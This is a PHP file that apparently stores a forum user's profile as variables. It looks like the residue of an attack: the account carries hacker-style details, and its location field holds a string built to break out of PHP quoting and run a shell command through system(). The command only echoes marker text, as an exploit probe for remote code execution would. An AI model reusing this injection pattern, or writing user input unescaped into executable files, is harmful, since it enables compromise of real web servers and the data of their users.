<?php

$userid="133";
$password="e799eb0a988b773f3f69cbae6329c24b";
$username="lamer";
$useralias="lamer";
$userrealname="";
$useremail="cool@hacker.ru";
$useremhide="hide";
$userip="10.2.118.11";
$usersig="";
$userslogan="rst.ghc!";
$useravatar="none";
$usermsn="";
$userposts="0";
$usericq="";
$userqq="";
$userwebavatar="";
$userrank="1";
$useryahoo="";
$useraim="";
$userlocation="'; system('echo _ENTER_; ; _QUIT_'); echo '";
$userjoined="1125864579";
$userhomepage="http://";
$useradmin="0";
$usermod="0";
$userban="0";
$userfriend="";
$userlastvisit="1125864611";
$userlastpost="1125864579";
$userprevvisit="1125864579";
$useranimsmilies="";
$lastaliaschange="1125864579";
$userlang="";
$uservisits="1";
$aliaslist="";
$noavatars="";

?>